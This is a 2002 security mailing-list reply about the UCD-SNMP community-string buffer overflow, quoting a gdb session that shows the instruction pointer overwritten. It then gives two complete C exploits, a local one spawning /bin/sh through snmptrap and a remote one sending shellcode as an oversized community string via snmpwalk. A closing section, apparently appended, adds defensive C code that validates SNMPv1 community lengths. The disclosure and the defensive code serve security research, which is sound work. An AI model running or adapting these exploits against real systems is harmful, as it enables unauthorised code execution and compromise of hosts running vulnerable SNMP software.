Re: Exploiting SNMP?

From: Nash Leon (nashleon@yahoo.com.br)
Date: 02/16/02


Date: Sat, 16 Feb 2002 07:24:13 -0300 (ART)
From: Nash Leon <nashleon@yahoo.com.br>
To: VULN-DEV@SECURITYFOCUS.COM


 --- H D Moore <slist@digitaloffense.net> wrote:
> On Thursday 14 February 2002 12:36 pm, foob@return0.net wrote:
> > Has anyone tried exploiting the SNMP problems disclosed in the recent CERT
> > notice, and originally investigated by the University of Oulu?
>
> The UCD-SNMP 4.2.1 package is trivial to exploit. A community string of
> exactly 256 bytes will smash eip. All testing was done on Linux, with both
> the Red Hat 7.1 RPM and the source installs of 4.2.1. Every version prior to
> 4.2.2 seems to be vulnerable to this (except some of the OBSD versions).
>
> Here is a quick session log, showing eip being overwritten in ucd 4.0.1:
>
> [root@penny /root]# snmpd -version
> [root@penny /root]# snmpd
> [root@penny /root]# ps ax | grep snmpd
> 20279 pts/0 S 0:00 snmpd
> 20283 pts/0 S 0:00 grep snmpd
> [root@penny /root]# which snmpd
> /usr/sbin/snmpd
> [root@penny /root]# gdb /usr/sbin/snmpd
> GNU gdb 4.18
> Copyright 1998 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you are
> welcome to change it and/or distribute copies of it under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for details.
> This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
> (gdb) attach 20279
> Attaching to program: /usr/sbin/snmpd, Pid 20279
> Reading symbols from /usr/lib/libsnmp.so.0...(no debugging symbols found)...done.
> Reading symbols from /lib/libnsl.so.1...done.
> Reading symbols from /usr/lib/librpm.so.0...done.
> Reading symbols from /lib/libdb.so.2...done.
> Reading symbols from /usr/lib/libz.so.1...done.
> Reading symbols from /lib/libm.so.6...done.
> Reading symbols from /lib/libc.so.6...c
> done.
> Reading symbols from /usr/lib/libbz2.so.0...done.
> Reading symbols from /lib/ld-linux.so.2...done.
> Reading symbols from /lib/libnss_files.so.2...done.
> 0x29b54e in __select () from /lib/libc.so.6
> (gdb) c
> Continuing.
>
> In another terminal:
> [root@penny /root]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
>
> Back to gdb:
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x90909090 in ?? ()
> (gdb)
> UCD-snmp version: 4.0.1
> Author: Wes Hardaker
> Email: ucd-snmp-coders@ucd-snmp.ucdavis.edu

Hi all!

The information in this post is correct! I wrote some
exploits for the ucd-snmp kit. There are many problems in
snmp_api(MAX_STRING_LEN):

/* Written by Nash Leon - http://coracaodeleao.virtualave.net/
 * nashleon@yahoo.com.br.
 * Kimera - Solucoes em Seguranca.
 * http://www.kimera.com.br/
 * Tested on UCD-SNMP-4.2.1 - Slackware 7.0.
 *
 * Exploit Sample for snmp_api() bug.
 *
 * Thanks for Kimera, Unsekurity Scene, Guys from PT,
 * Axur Corp., BufferOverflow.org, Int 0x80, Core SDI,
 * #int80h and all latin hackers.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define NOP 0x90
#define OFFSET 0
#define ALIGN 0
#define BUFLEN 2584 // Slack 7.0
#define ERRO -1

char shellcode[]=
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]){
    char *buffer;
    long retaddr;
    int i, tamanho = BUFLEN, offset = OFFSET;

    if (argc > 1) {
        offset = atoi(argv[1]);
    }

    printf("Local Exploit for snmp_api by Nash Leon...\n\n");

    /* one extra byte so the string handed to execl() is NUL-terminated */
    if(!(buffer = (char *)malloc(tamanho + 1))){
        fprintf(stderr,"Unable to allocate memory!!\n");
        exit(1);
    }

    retaddr = 0xbffff812 - offset;
    printf("Using retaddr: 0x%lx\n\n",retaddr);

    /* fill the whole buffer with the return address, little-endian */
    for (i=0;i<tamanho;i+=4) {
        buffer[i+ALIGN]=(retaddr&0x000000ff);
        buffer[i+ALIGN+1]=(retaddr&0x0000ff00)>>8;
        buffer[i+ALIGN+2]=(retaddr&0x00ff0000)>>16;
        buffer[i+ALIGN+3]=(retaddr&0xff000000)>>24;
    }
    /* NOP sled, then the shellcode, leaving 100 bytes of return addresses */
    for (i=0;i<(tamanho-(int)strlen(shellcode)-100);i++)
        *(buffer+i) = NOP;

    memcpy(buffer+i,shellcode,strlen(shellcode));
    buffer[tamanho] = '\0';

    /*
    execl("/usr/local/bin/snmpset","snmpset","localhost","system.sysContact.0",
          "s",buffer,(char *)0); */
    /* or again: */
    execl("/usr/local/bin/snmptrap","snmptrap","localhost","private","localhost",
          "127.0.0.1","3","0","system.sysContact.0","s",buffer,(char *)0);

    return 0;
}

Note that this program is not suid in a default installation.
Remotely, there are many problems too, in snmpd and
snmptrapd. Below, we can see one example of an exploit
based on the information provided by H D Moore:

/* Remote Exploit for UCD-SNMP prior 4.2.2 by Nash Leon.
 * nashleon@yahoo.com.br
 * Kimera - Solucoes em Seguranca.
 * http://www.kimera.com.br/
 *
 * Tested on:
 * Slackware 7.0;
 * Private Version, tested on:
 * Slackware 8.0;
 * FreeBSD 4.2;
 *
 * Credits: CERT Advisory - http://www.cert.org/ - CA-2002-03.snmp.
 * Thanks for Kimera, Unsekurity Scene, Axur Corp., BufferOverflow.org,
 * Guys from Portugal(#alrg), #int80h, Core-SDI and all Latin Hackers.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define ERROR -1
#define BUFLEN 252
#define NOP 0x90
#define OFFSET 0
#define RET 0xbfffc9a4 // Slackware 7.0
#define ALIGN 0

/* ShellCode write in /etc/motd(Script Kiddie?)
 */

unsigned char x86_linux[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\xeb\x20\x5e\x8d"
"\x1e\x88\x56\x09\xb0\x05\x66\xb9\x02\x0c\xcd\x80\x8d\x4b\x0a\x89"
"\xc3\xb0\x04\xb2\x08\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80\xe8\xdb"
"\xff\xff\xff/etc/motd8NashLeon\x0A";

int main(int argc, char *argv[]){
    unsigned long ret=RET;
    char *buffer;
    unsigned int i;

    if(argc < 2){
        printf("Remote Exploit for UCD-SNMP by Nash Leon\n");
        printf("Kimera - Solucoes em Seguranca\n");
        printf("http://www.kimera.com.br/\n\n");
        printf("Uso: %s <ip_dest> <ret> <offset>\n",argv[0]);
        exit(0);
    }

    printf("Executing Exploit....\n");

    /* one extra byte so the community string is NUL-terminated */
    buffer = (char *)malloc(BUFLEN + 1);
    if(buffer == NULL){
        printf("Unable to aloc memory!");
        exit(ERROR);
    }

    if(argc > 2){
        ret = atoi(argv[2]);
    }

    if(argc > 3){
        ret = ret + atoi(argv[3]);
    }

    printf("Using Address: %#lx\n",ret);

    /* fill the buffer with the return address, little-endian */
    for (i = 0; i < BUFLEN; i += 4 ){
        buffer[i+ALIGN]=(ret & 0xff);
        buffer[i+ALIGN+1]=(ret & 0xff00) >> 8;
        buffer[i+ALIGN+2]=(ret & 0xff0000) >> 16;
        buffer[i+ALIGN+3]=(ret & 0xff000000) >> 24;
    }

    /* NOP sled, then the shellcode, leaving 144 bytes of return addresses */
    for (i = 0; i < BUFLEN - strlen(x86_linux) - 144; i++)
        *(buffer+i) = NOP;

    memcpy(buffer + i, x86_linux, strlen(x86_linux));
    buffer[BUFLEN] = '\0';

    printf("BuffLength: %zu\n",strlen(buffer));
    execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,(char *)NULL);
    printf("Exploit Terminated!!\n");
    return 0;
}

This example only adds one string to /etc/motd (not for
script kiddies).

Regards,

Nash Leon.

PS: Sorry for my poor English.
New version of UCD-SNMPd in http://www.net-snmp.org/
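The input class H D Moore describes above, a community string longer than the receiver's fixed buffer, is exactly what a length check before the copy has to reject. The program below is an added example, not code from this post or from ucd-snmp/net-snmp: it decodes the SNMPv1 message header (BER: SEQUENCE { INTEGER version, OCTET STRING community, PDU }) from constructed packets and refuses to copy a community string longer than an assumed local limit MAX_COMMUNITY (128 bytes), returning an error instead of overrunning anything. The names ber_header, snmp_community, build_snmpv1, check and check_truncated are all chosen here; the packets are constructed in the code.

```c
/* Added example (not from the post or from ucd-snmp/net-snmp): extract the
 * SNMPv1 community string with a length check before any copy happens.
 * MAX_COMMUNITY is an assumed local limit; all packets below are constructed. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_COMMUNITY 128

/* Decode one BER tag + length (short form, or long form of up to 2 bytes).
 * Returns the header size, or 0 if the header is malformed or truncated. */
static size_t ber_header(const unsigned char *p, size_t avail,
                         unsigned char *tag, size_t *len)
{
    if (avail < 2) return 0;
    *tag = p[0];
    if (p[1] < 0x80) { *len = p[1]; return 2; }
    size_t n = p[1] & 0x7f;                 /* number of length bytes */
    if (n == 0 || n > 2 || avail < 2 + n) return 0;
    size_t l = 0;
    for (size_t i = 0; i < n; i++) l = (l << 8) | p[2 + i];
    *len = l;
    return 2 + n;
}

/* Copy the community string of an SNMPv1 message into out, NUL-terminated.
 * Returns its length, -1 for malformed/truncated BER, or -2 when the community
 * exceeds MAX_COMMUNITY or the output buffer (nothing is copied in that case). */
int snmp_community(const unsigned char *msg, size_t msglen,
                   char *out, size_t outsz)
{
    unsigned char tag; size_t len, h, off;

    h = ber_header(msg, msglen, &tag, &len);              /* outer SEQUENCE */
    if (!h || tag != 0x30 || len > msglen - h) return -1;
    off = h;
    h = ber_header(msg + off, msglen - off, &tag, &len);  /* INTEGER version */
    if (!h || tag != 0x02 || len > msglen - off - h) return -1;
    off += h + len;
    h = ber_header(msg + off, msglen - off, &tag, &len);  /* OCTET STRING */
    if (!h || tag != 0x04 || len > msglen - off - h) return -1;
    off += h;
    if (len > MAX_COMMUNITY || len >= outsz) return -2;   /* reject, don't copy */
    memcpy(out, msg + off, len);
    out[len] = '\0';
    return (int)len;
}

/* Encode a BER length (short form or 2-byte long form); returns bytes written. */
static size_t ber_len(unsigned char *p, size_t len)
{
    if (len < 0x80) { p[0] = (unsigned char)len; return 1; }
    p[0] = 0x82; p[1] = (unsigned char)(len >> 8); p[2] = (unsigned char)len;
    return 3;
}

/* Build a constructed SNMPv1 GetRequest whose community is clen bytes of 'A'.
 * Returns the message size, or 0 if clen does not fit. */
size_t build_snmpv1(unsigned char *buf, size_t bufsz, size_t clen)
{
    unsigned char body[600]; size_t n = 0, h;
    if (clen > 512) return 0;
    body[n++] = 0x02; body[n++] = 0x01; body[n++] = 0x00; /* version 0 = v1 */
    body[n++] = 0x04; n += ber_len(body + n, clen);         /* community */
    memset(body + n, 'A', clen); n += clen;
    body[n++] = 0xa0; body[n++] = 0x00;                     /* empty GetRequest */
    h = 1 + (n < 0x80 ? 1 : 3);
    if (h + n > bufsz) return 0;
    buf[0] = 0x30; ber_len(buf + 1, n);
    memcpy(buf + h, body, n);
    return h + n;
}

/* Build a message with a clen-byte community and return the parser's verdict. */
int check(size_t clen)
{
    unsigned char msg[600]; char community[MAX_COMMUNITY + 1];
    size_t n = build_snmpv1(msg, sizeof msg, clen);
    return n ? snmp_community(msg, n, community, sizeof community) : -1;
}

/* Same, but hand the parser 3 bytes fewer than the message claims to hold. */
int check_truncated(void)
{
    unsigned char msg[600]; char community[MAX_COMMUNITY + 1];
    size_t n = build_snmpv1(msg, sizeof msg, 6);
    return snmp_community(msg, n - 3, community, sizeof community);
}

int main(void)
{
    size_t lens[] = { 6, 128, 129, 256 };
    for (size_t i = 0; i < 4; i++)
        printf("community of %3zu bytes -> %d\n", lens[i], check(lens[i]));
    printf("truncated message        -> %d\n", check_truncated());
    return 0;
}
```

The 256-byte community from the session log above comes back as -2 without a byte being copied, and a message whose declared lengths exceed what was actually received comes back as -1; the same two checks (declared length against bytes available, then payload length against the destination) are what an IDS rule or a hardened agent needs in front of any fixed-size community buffer.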
